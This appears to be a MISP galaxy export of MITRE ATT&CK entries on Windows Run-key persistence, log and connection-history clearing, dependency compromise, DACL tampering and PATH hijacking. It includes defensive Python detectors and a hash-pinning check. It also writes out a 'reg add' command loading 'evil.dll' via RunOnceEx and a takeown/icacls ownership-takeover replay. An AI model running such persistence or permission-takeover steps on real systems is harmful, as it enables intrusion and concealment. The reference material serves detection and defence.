The following run keys are created by default on Windows systems:

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</code>

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce</code>

  • <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run</code>

  • <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce</code>

Run keys may also exist under the <code>Wow6432Node</code> redirected view that 64-bit Windows presents to 32-bit software, for example <code>HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run</code>.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx</code> key is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.(Citation: Microsoft Run Key) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: <code>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"</code> (Citation: Oddvar Moe RunOnceEx Mar 2018)

Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is <code>C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup</code>. The startup folder path for all users is <code>C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp</code>.

The following Registry keys can be used to set startup folder items for persistence:

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code>

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code>

  • <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code>

  • <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code>

The following Registry keys can control automatic startup of services during boot:

  • <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</code>

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</code>

  • <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices</code>

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices</code>

Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:

  • <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</code>

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</code>

Programs listed in the <code>load</code> value of the registry key <code>HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows</code> run automatically for the currently logged-on user.

By default, the multistring <code>BootExecute</code> value of the registry key <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager</code> is set to <code>autocheck autochk *</code>. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.

Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.
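The locations listed above are the ones a defender enumerates first. The following is an added example, not code from the MISP galaxy or from ATT&CK: it parses the text that <code>reg query &lt;key&gt; /s</code> prints for the Run, RunOnce and RunOnceEx keys and flags entries that match the patterns the technique describes (a payload in a user-writable or temporary directory, a system process name outside System32, execution through a proxy binary, or a DLL listed under a RunOnceEx <code>Depend</code> subkey). The registry dump, the environment-variable defaults and the path heuristics are this example's own constructed assumptions, not data captured from a real host.

```python
"""Triage Windows Run-key persistence entries (added example).

Parses the text that `reg query <key> /s` prints and flags entries that
look like the persistence described above. The registry dump, the
environment-variable defaults and the path heuristics are this example's
own constructed assumptions, not data from a real host.
"""
import re
from dataclasses import dataclass

# Constructed `reg query` output covering the Run keys listed above plus a
# RunOnceEx\...\Depend subkey that loads a DLL at logon.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    VMware User Process    REG_SZ    "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Updater    REG_SZ    C:\Users\alice\AppData\Local\Temp\svchost.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend
    1    REG_SZ    C:\temp\evil.dll
"""

# Assumed defaults for the variables that REG_EXPAND_SZ data commonly uses.
ENV = {"%windir%": "c:\\windows", "%systemroot%": "c:\\windows",
       "%programfiles%": "c:\\program files", "%programdata%": "c:\\programdata"}
# Locations an unprivileged user can write to (heuristic, lower-case, trailing separator).
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\downloads\\", "\\users\\public\\",
                 "\\temp\\", "\\tmp\\", "$recycle.bin\\")
# Core Windows process names that should only ever live under System32/SysWOW64.
SYSTEM_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe", "services.exe", "smss.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Binaries commonly used to proxy execution of a script or DLL.
PROXY_BINARIES = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe",
                  "cscript.exe", "powershell.exe", "cmd.exe"}

# `reg query` prints values as: <indent><name><4 spaces><REG_type><4 spaces><data>
VALUE_RE = re.compile(r"^\s+(?P<name>.+?)\s{2,}(?P<type>REG_[A-Z_]+)\s+(?P<data>.*)$")


@dataclass
class Finding:
    key: str
    name: str
    image: str
    reasons: list


def parse_reg_query(text):
    """Yield (key, value_name, value_data) triples from reg query output."""
    key = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line[0].isspace() and line.upper().startswith("HK"):
            key = line.strip()          # a key header line
            continue
        m = VALUE_RE.match(line)
        if m and key:
            yield key, m["name"], m["data"]


def image_path(data):
    """Extract the program path from value data, lower-cased and env-expanded."""
    data = data.strip()
    if data.startswith('"'):
        end = data.find('"', 1)
        path = data[1:end] if end > 0 else data[1:]
    else:
        path = data.split()[0] if data else ""
    path = path.lower()
    for var, val in ENV.items():
        path = path.replace(var, val)
    return path


def triage(text):
    """Return a Finding for every entry matching at least one heuristic."""
    findings = []
    for key, name, data in parse_reg_query(text):
        image = image_path(data)
        base = image.rsplit("\\", 1)[-1]
        reasons = []
        if "\\runonceex\\" in key.lower() and key.lower().endswith("\\depend"):
            reasons.append("DLL loaded at logon via RunOnceEx Depend value")
        if any(marker in image for marker in USER_WRITABLE):
            reasons.append("payload in a user-writable or temporary location")
        if base in SYSTEM_NAMES and not image.startswith(SYSTEM_DIRS):
            reasons.append("system process name outside System32 (masquerading)")
        if base in PROXY_BINARIES:
            reasons.append("launched through a proxy binary; inspect its arguments")
        if reasons:
            findings.append(Finding(key, name, image, reasons))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_REG_QUERY):
        print(f"{f.key}\n  {f.name} -> {f.image}\n  " + "; ".join(f.reasons))
```

On the constructed dump the script flags only the <code>Updater</code> value (a binary named like a system process sitting in the user's Temp directory) and the RunOnceEx <code>Depend</code> entry; the Microsoft, VMware and OneDrive entries pass. The heuristics are deliberately narrow, and the startup folders, the policy <code>Explorer\Run</code> keys and <code>BootExecute</code> listed above need their own collection; the key names also have to be queried under <code>Wow6432Node</code> on 64-bit hosts.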

The tag is: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"

Table 5351. Table References

Links

http://msdn.microsoft.com/en-us/library/aa376977

https://attack.mitre.org/techniques/T1547/001

https://blog.malwarebytes.com/cybercrime/2013/10/hiding-in-plain-sight/

https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry

https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/

https://technet.microsoft.com/en-us/sysinternals/bb963902

Clear Linux or Mac System Logs - T1070.002

Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both record system and user-initiated actions in system logs. Most native logging on Linux is stored under the <code>/var/log/</code> directory, where files and subdirectories are organised by function, such as:(Citation: Linux Logs) On systemd-based distributions much of the same data also lives in the binary journal (<code>/var/log/journal/</code> or <code>/run/log/journal/</code>), and macOS since 10.12 writes most events to the unified log rather than to <code>/var/log/</code>, so checking only the text files below can miss both the evidence and its removal.

  • <code>/var/log/messages</code>: General and system-related messages

  • <code>/var/log/secure</code> or <code>/var/log/auth.log</code>: Authentication logs

  • <code>/var/run/utmp</code> (current sessions), <code>/var/log/wtmp</code> (login history) and <code>/var/log/btmp</code> (failed logins): Login records

  • <code>/var/log/kern.log</code>: Kernel logs

  • <code>/var/log/cron.log</code>: Crond logs

  • <code>/var/log/maillog</code>: Mail server logs

  • <code>/var/log/httpd/</code>: Web server access and error logs
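The login records are the log most often edited rather than simply deleted, because a wiped wtmp is obvious while a record-level edit is not. The following is an added example, not code from the MISP galaxy or from ATT&CK: it decodes wtmp records using glibc's <code>struct utmp</code> layout on x86_64 Linux (384-byte little-endian records) and looks for three artefacts that cleaners tend to leave: records overwritten with zeros, timestamps that run backwards, and a logout record whose login record has been removed. The wtmp image is constructed in memory so the example runs offline; on a host you would read <code>/var/log/wtmp</code> (or <code>/var/run/utmp</code> for live sessions) instead.

```python
"""Inspect a Linux wtmp image for the traces log cleaners leave (added example).

Models glibc's `struct utmp` on x86_64 (384-byte little-endian records) and
checks three things a wiped or edited wtmp tends to show: all-zero records,
timestamps that run backwards, and logouts without a matching login. The
wtmp bytes below are constructed in memory; on a host you would read
/var/log/wtmp (or /var/run/utmp for live sessions).
"""
import struct

# ut_type, pad, ut_pid, ut_line[32], ut_id[4], ut_user[32], ut_host[256],
# ut_exit{termination,exit}, ut_session, ut_tv{sec,usec}, ut_addr_v6[4], unused[20]
UTMP_FMT = "<hxxi32s4s32s256shhiii4i20x"
UTMP_SIZE = struct.calcsize(UTMP_FMT)        # 384 bytes
USER_PROCESS, DEAD_PROCESS = 7, 8            # ut_type values from <utmp.h>


def pack_record(ut_type, pid, line, user, host, ts):
    """Build one wtmp record (used only to construct the sample image)."""
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), b"", user.encode(),
                       host.encode(), 0, 0, 0, ts, 0, 0, 0, 0, 0)


# Constructed wtmp: two logins, one record zeroed by an attacker, one logout whose
# login record was removed, and one record appended with an older timestamp.
SAMPLE_WTMP = b"".join([
    pack_record(USER_PROCESS, 1001, "pts/0", "alice", "10.0.0.5", 1700000000),
    pack_record(USER_PROCESS, 1002, "pts/1", "bob", "10.0.0.9", 1700000100),
    b"\0" * UTMP_SIZE,
    pack_record(DEAD_PROCESS, 1002, "pts/1", "", "", 1700000500),
    pack_record(DEAD_PROCESS, 1003, "pts/2", "", "", 1700000600),
    pack_record(DEAD_PROCESS, 1001, "pts/0", "", "", 1700000400),
])


def _cstr(b):
    """Decode a NUL-padded fixed-width field."""
    return b.split(b"\0", 1)[0].decode("utf-8", errors="replace")


def parse_wtmp(data):
    """Decode every whole record; a trailing partial record is ignored."""
    records = []
    for idx in range(len(data) // UTMP_SIZE):
        chunk = data[idx * UTMP_SIZE:(idx + 1) * UTMP_SIZE]
        if chunk.count(0) == UTMP_SIZE:
            records.append({"index": idx, "zeroed": True})
            continue
        (ut_type, pid, line, _id, user, host, _term, _exit, _sess,
         sec, _usec, *_addr) = struct.unpack(UTMP_FMT, chunk)
        records.append({"index": idx, "zeroed": False, "type": ut_type, "pid": pid,
                        "line": _cstr(line), "user": _cstr(user), "host": _cstr(host),
                        "ts": sec})
    return records


def find_tampering(records):
    """Return human-readable findings. Each heuristic has a benign explanation
    (clock changes, log rotation in the middle of a session), so treat hits as leads."""
    findings, last_ts, open_lines = [], None, set()
    for r in records:
        if r["zeroed"]:
            findings.append(f"record {r['index']}: all-zero record (classic utmp/wtmp wiper artefact)")
            continue
        if last_ts is not None and r["ts"] < last_ts:
            findings.append(f"record {r['index']}: timestamp earlier than the previous record (file edited?)")
        last_ts = r["ts"]
        if r["type"] == USER_PROCESS:
            open_lines.add(r["line"])
        elif r["type"] == DEAD_PROCESS:
            if r["line"] not in open_lines:
                findings.append(f"record {r['index']}: logout on {r['line']} with no preceding login (record removed?)")
            open_lines.discard(r["line"])
    return findings


if __name__ == "__main__":
    for finding in find_tampering(parse_wtmp(SAMPLE_WTMP)):
        print(finding)
```

Run against a real file with <code>parse_wtmp(open("/var/log/wtmp", "rb").read())</code>; the record layout differs on 32-bit and non-glibc systems, so check <code>UTMP_SIZE</code> against the file size first. Zeroed and out-of-order records are the stronger signals; an orphan logout at the very start of a file is normal after log rotation.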

The tag is: misp-galaxy:mitre-attack-pattern="Clear Linux or Mac System Logs - T1070.002"

Table 5352. Table References

Links

https://attack.mitre.org/techniques/T1070/002

https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/

Clear Network Connection History and Configurations - T1070.007

Adversaries may clear or remove evidence of malicious network connections in order to clean up traces of their operations. Configuration settings as well as various artifacts that highlight connection history may be created on a system and/or in application logs from behaviors that require network connections, such as [Remote Services](https://attack.mitre.org/techniques/T1021) or [External Remote Services](https://attack.mitre.org/techniques/T1133). Defenders may use these artifacts to monitor or otherwise analyze network connections created by adversaries.

Network connection history may be stored in various locations. For example, RDP connection history may be stored in Windows Registry values under (Citation: Microsoft RDP Removal):

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default</code>

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers</code>

Windows may also store information about recent RDP connections in files such as <code>C:\Users\%username%\Documents\Default.rdp</code> and <code>C:\Users\%username%\AppData\Local\Microsoft\Terminal Server Client\Cache\</code>.(Citation: Moran RDPieces) Similarly, macOS and Linux hosts may store information highlighting connection history in system logs (such as those stored in <code>/Library/Logs</code> and/or <code>/var/log/</code>).(Citation: Apple Culprit Access)(Citation: FreeDesktop Journal)(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)

Malicious network connections may also require changes to third-party applications or network configuration settings, such as [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004) or tampering to enable [Proxy](https://attack.mitre.org/techniques/T1090). Adversaries may delete or modify this data to conceal indicators and/or impede defensive analysis.

The tag is: misp-galaxy:mitre-attack-pattern="Clear Network Connection History and Configurations - T1070.007"

Table 5353. Table References

Links

https://attack.mitre.org/techniques/T1070/007

https://discussions.apple.com/thread/3991574

https://docs.microsoft.com/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer

https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins

https://www.freedesktop.org/software/systemd/man/systemd-journald.service.html

https://www.osdfcon.org/presentations/2020/Brian-Moran_Putting-Together-the-RDPieces.pdf

Compromise Software Dependencies and Development Tools - T1195.001

Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency.(Citation: Trendmicro NPM Compromise)

Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.

The tag is: misp-galaxy:mitre-attack-pattern="Compromise Software Dependencies and Development Tools - T1195.001"

Table 5354. Table References

Links

https://attack.mitre.org/techniques/T1195/001

https://www.trendmicro.com/vinfo/dk/security/news/cybercrime-and-digital-threats/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets

Windows File and Directory Permissions Modification - T1222.001

Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).

Windows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).(Citation: Microsoft DACL May 2018) Like a standard ACL, a DACL identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system walks the access control entries (ACEs) in the DACL in order, considering only those whose trustee appears in the caller's access token: an access-denied ACE that denies any requested right stops the check with access denied; access-allowed ACEs accumulate rights until every requested right has been granted, at which point the check stops with access granted; reaching the end of the DACL with any requested right still ungranted means access is denied. Because the walk stops at the first decisive ACE, ACE order matters, and the canonical order places explicit deny ACEs before explicit allow ACEs, ahead of inherited ones. A NULL DACL grants everyone full access, whereas an empty DACL grants no one any access.(Citation: Microsoft Access Control Lists May 2018)

Adversaries can interact with the DACLs using built-in Windows commands, such as icacls, cacls, takeown, and attrib, which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://attack.mitre.org/techniques/T1059/001) provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).
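The access check above, as an added example that is not code from the page, from MITRE or from Microsoft: a small Python model of the DACL walk, the owner's implicit rights, and the NULL versus empty DACL cases, followed by a replay of the <code>takeown</code> then <code>icacls /grant</code> sequence an adversary uses to make a protected system binary writable. The SIDs are the real well-known values; the file, its DACL, the token and the command replay are constructed assumptions.

```python
"""Evaluate a Windows DACL the way the access check described above does (added example).

Models the documented algorithm: walk the ACEs in order, stop on the first
access-denied ACE that denies a requested right, grant once access-allowed
ACEs cover every requested right, deny implicitly at the end. A NULL DACL
grants everyone full access; an empty DACL grants nobody anything. It then
replays the takeown-then-icacls sequence the technique mentions. SIDs are real
well-known values; the file, its DACL and the token are constructed.
"""
from dataclasses import dataclass
from typing import List, Optional

# Access mask bits, values as defined in the Windows SDK.
FILE_READ_DATA, FILE_WRITE_DATA, FILE_EXECUTE = 0x1, 0x2, 0x20
DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER = 0x10000, 0x20000, 0x40000, 0x80000
FILE_ALL_ACCESS = 0x1F01FF

SYSTEM, ADMINS, USERS, EVERYONE = "S-1-5-18", "S-1-5-32-544", "S-1-5-32-545", "S-1-1-0"
TRUSTED_INSTALLER = "S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464"
ALLOW, DENY = "allow", "deny"


@dataclass
class Ace:
    kind: str          # ALLOW or DENY
    sid: str           # trustee
    mask: int          # rights this ACE allows or denies
    inherited: bool = False


@dataclass
class SecurityDescriptor:
    owner: str
    dacl: Optional[List[Ace]]   # None models a NULL DACL, [] an empty DACL


def ace_rank(ace):
    """Canonical order: explicit deny, explicit allow, inherited deny, inherited allow."""
    return (ace.inherited, ace.kind == ALLOW)


def is_canonical(dacl):
    return all(ace_rank(a) <= ace_rank(b) for a, b in zip(dacl, dacl[1:]))


def access_check(sd, token_sids, desired):
    """Return (granted, reason) for a token holding `token_sids` requesting `desired`."""
    if sd.dacl is None:
        return True, "NULL DACL: everyone gets full access"
    granted = 0
    if sd.owner in token_sids:           # owners always hold READ_CONTROL and WRITE_DAC
        granted |= (READ_CONTROL | WRITE_DAC) & desired
        if granted == desired:
            return True, "granted by implicit owner rights"
    for i, ace in enumerate(sd.dacl):
        if ace.sid not in token_sids:
            continue
        if ace.kind == DENY and ace.mask & desired:
            return False, f"ACE {i} explicitly denies {ace.sid}"
        if ace.kind == ALLOW:
            granted |= ace.mask & desired
            if granted == desired:
                return True, f"all requested rights granted by ACE {i}"
    return False, "end of DACL reached with rights still ungranted (implicit deny)"


def sample_system_file():
    """A system binary owned by TrustedInstaller: administrators may read and execute only."""
    return SecurityDescriptor(owner=TRUSTED_INSTALLER, dacl=[
        Ace(ALLOW, TRUSTED_INSTALLER, FILE_ALL_ACCESS),
        Ace(ALLOW, SYSTEM, FILE_READ_DATA | FILE_EXECUTE),
        Ace(ALLOW, ADMINS, FILE_READ_DATA | FILE_EXECUTE),
        Ace(ALLOW, USERS, FILE_READ_DATA | FILE_EXECUTE),
    ])


ADMIN_TOKEN = {ADMINS, USERS, EVERYONE}


def takeown_then_grant(sd, token_sids):
    """Replay `takeown /f <file>` followed by `icacls <file> /grant Administrators:F`.
    takeown relies on SeTakeOwnershipPrivilege, so it needs no WRITE_OWNER in the
    DACL; ownership then yields WRITE_DAC, which icacls needs to add the ACE."""
    sd.owner = ADMINS
    ok, _ = access_check(sd, token_sids, WRITE_DAC)
    if ok and sd.dacl is not None:
        sd.dacl.append(Ace(ALLOW, ADMINS, FILE_ALL_ACCESS))
        sd.dacl.sort(key=ace_rank)       # icacls keeps the DACL canonical
    return sd


if __name__ == "__main__":
    sd = sample_system_file()
    print("write before:", access_check(sd, ADMIN_TOKEN, FILE_WRITE_DATA))
    print("write after: ", access_check(takeown_then_grant(sd, ADMIN_TOKEN), ADMIN_TOKEN, FILE_WRITE_DATA))
```

The replay is why ownership changes and <code>WRITE_DAC</code> grants deserve their own detection (Security log events 4670 and 4674 cover permission changes and privileged operations), and why a DACL that denies <code>WRITE_DAC</code> to administrators still does not stop a member of the Administrators group who can take ownership.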

The tag is: misp-galaxy:mitre-attack-pattern="Windows File and Directory Permissions Modification - T1222.001"

Table 5355. Table References

Links

https://attack.mitre.org/techniques/T1222/001

https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists

https://docs.microsoft.com/windows/desktop/secauthz/dacls-and-aces

https://www.eventtracker.com/tech-articles/monitoring-file-permission-changes-windows-security-log/

https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110

https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100

Compromise Software Dependencies and Development Tools - T1474.001

Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency.(Citation: Grace-Advertisement)
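The consumer-side control against the dependency substitution described in T1195.001 and T1474.001 above is to pin each artifact to a content hash and refuse anything that does not match. The following is an added example, not code from the MISP galaxy, from ATT&CK or from pip: a lockfile parser for pip's <code>--hash=sha256:</code> requirement syntax and a verifier that accepts an artifact only if its name, version and digest all match. The artifacts and the lockfile are constructed in memory so the example runs offline; the package names are illustrative and the digests are computed from the constructed bytes.

```python
"""Reject dependency artifacts that do not match a pinned content hash (added example).

A lockfile records one or more sha256 digests per pinned version (pip's
`--hash=sha256:` requirement syntax is used here) and an artifact is accepted
only if its name, version and digest all match. Artifacts and lockfile are
constructed in memory so the example runs offline.
"""
import hashlib

GOOD_ARTIFACT = b"constructed stand-in for requests-2.31.0.tar.gz"
TAMPERED_ARTIFACT = GOOD_ARTIFACT + b"\n# added post-install hook that reads ~/.netrc"

# Constructed lockfile; the first digest is computed from GOOD_ARTIFACT so the
# example is self-consistent, the second is a placeholder for an artifact never fetched.
LOCKFILE = f"""# generated by `pip-compile --generate-hashes` (constructed)
requests==2.31.0 \\
    --hash=sha256:{hashlib.sha256(GOOD_ARTIFACT).hexdigest()}
urllib3==2.0.7 --hash=sha256:{'0' * 64}
"""


def parse_lockfile(text):
    """Map package name -> (version, set of allowed sha256 hex digests)."""
    pins = {}
    for line in text.replace("\\\n", " ").splitlines():   # join continuation lines
        line = line.split("#", 1)[0].strip()               # drop comments and blanks
        if not line:
            continue
        parts = line.split()
        name, _, version = parts[0].partition("==")
        hashes = {p[len("--hash=sha256:"):] for p in parts[1:] if p.startswith("--hash=sha256:")}
        pins[name.lower()] = (version, hashes)
    return pins


def verify_artifact(pins, name, version, content):
    """Return (ok, reason). Unpinned packages fail closed: a transitive dependency
    that appears without a lockfile update is itself a signal worth investigating."""
    pin = pins.get(name.lower())
    if pin is None:
        return False, f"{name} is not in the lockfile"
    want_version, want_hashes = pin
    if version != want_version:
        return False, f"{name}: resolved {version} but lockfile pins {want_version}"
    digest = hashlib.sha256(content).hexdigest()
    if digest not in want_hashes:
        return False, f"{name}=={version}: sha256 {digest[:16]}... is not a pinned digest"
    return True, f"{name}=={version}: digest matches"


def verify_all(pins, resolved):
    """resolved: iterable of (name, version, content bytes) -> list of (name, ok, reason)."""
    return [(n, *verify_artifact(pins, n, v, c)) for n, v, c in resolved]


if __name__ == "__main__":
    pins = parse_lockfile(LOCKFILE)
    for name, ok, reason in verify_all(pins, [
        ("requests", "2.31.0", GOOD_ARTIFACT),
        ("requests", "2.31.0", TAMPERED_ARTIFACT),
        ("left-pad", "1.0.0", b"x"),
    ]):
        print("OK  " if ok else "FAIL", reason)
```

Hash pinning catches an artifact that was replaced at the index, on a mirror or in transit after the pin was recorded; it does nothing against a malicious version that was pinned in the first place, which is why the pin update itself needs review. The same check exists for the mobile toolchains T1474.001 concerns, for example Gradle's dependency verification metadata and CocoaPods checksums.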

The tag is: misp-galaxy:mitre-attack-pattern="Compromise Software Dependencies and Development Tools - T1474.001"

Table 5356. Table References

Links

https://attack.mitre.org/techniques/T1474/001

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-6.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-0.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-10.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-15.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-3.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-9.html

https://www.csc2.ncsu.edu/faculty/xjiang4/pubs/WISEC12_ADRISK.pdf

Path Interception by PATH Environment Variable - T1574.007

Adversaries may execute their own malicious payloads by hijacking the environment variables the operating system uses to locate programs. The PATH environment variable contains a list of directories (user and system) that the OS searches in order for the binary named in a script or on the command line.

Adversaries can place a malicious program in an earlier entry in the list of directories stored in the PATH environment variable, resulting in the operating system executing the malicious binary rather than the legitimate binary when it searches sequentially through that PATH listing.

For example, on Windows, if an adversary places a malicious program named "net.exe" in <code>C:\example</code>, and that directory precedes <code>C:\Windows\system32</code> in the PATH environment variable, then running "net" from the command line executes <code>C:\example\net.exe</code> instead of the legitimate <code>C:\Windows\system32\net.exe</code>. Some methods of executing a program rely on the PATH environment variable to determine the locations that are searched when the path for the program is not given, such as executing programs from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: ExpressVPN PATH env Windows 2021)

Adversaries may also directly modify the $PATH variable that specifies the directories to be searched. An adversary can modify $PATH to point to a directory to which they have write access; when a program that relies on $PATH is called, the OS searches that directory first and executes the malicious binary. On macOS, this can also be performed by modifying the $HOME variable. These variables can be modified from the command line, with launchctl, through [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or by modifying the contents of the /etc/paths.d folder.(Citation: uptycs Fake POC linux malware 2023)(Citation: nixCraft macOS PATH variables)(Citation: Elastic Rules macOS launchctl 2022)

The tag is: misp-galaxy:mitre-attack-pattern="Path Interception by PATH Environment Variable - T1574.007"

Table 5357. Table References

Links

https://attack.mitre.org/techniques/T1574/007

https://www.cyberciti.biz/faq/appleosx-bash-unix-change-set-path-environment-variable/

https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-4-modification-of-environment-variable-via-launchctl.html

https://www.expressvpn.com/blog/cybersecurity-lessons-a-path-vulnerability-in-windows/

https://www.uptycs.com/blog/new-poc-exploit-backdoor-malware

Path Interception by Search Order Hijacking - T1574.008

Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.

Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program’s directory.

For example, suppose "example.exe" runs "cmd.exe" with the command-line argument <code>net user</code>. If an adversary places a program called "net.exe" in the same directory as example.exe, that "net.exe" will run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then <code>cmd.exe /C net user</code> will execute "net.com" instead of "net.exe" because of the order of executable extensions defined in PATHEXT. (Citation: Microsoft Environment Property)

Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
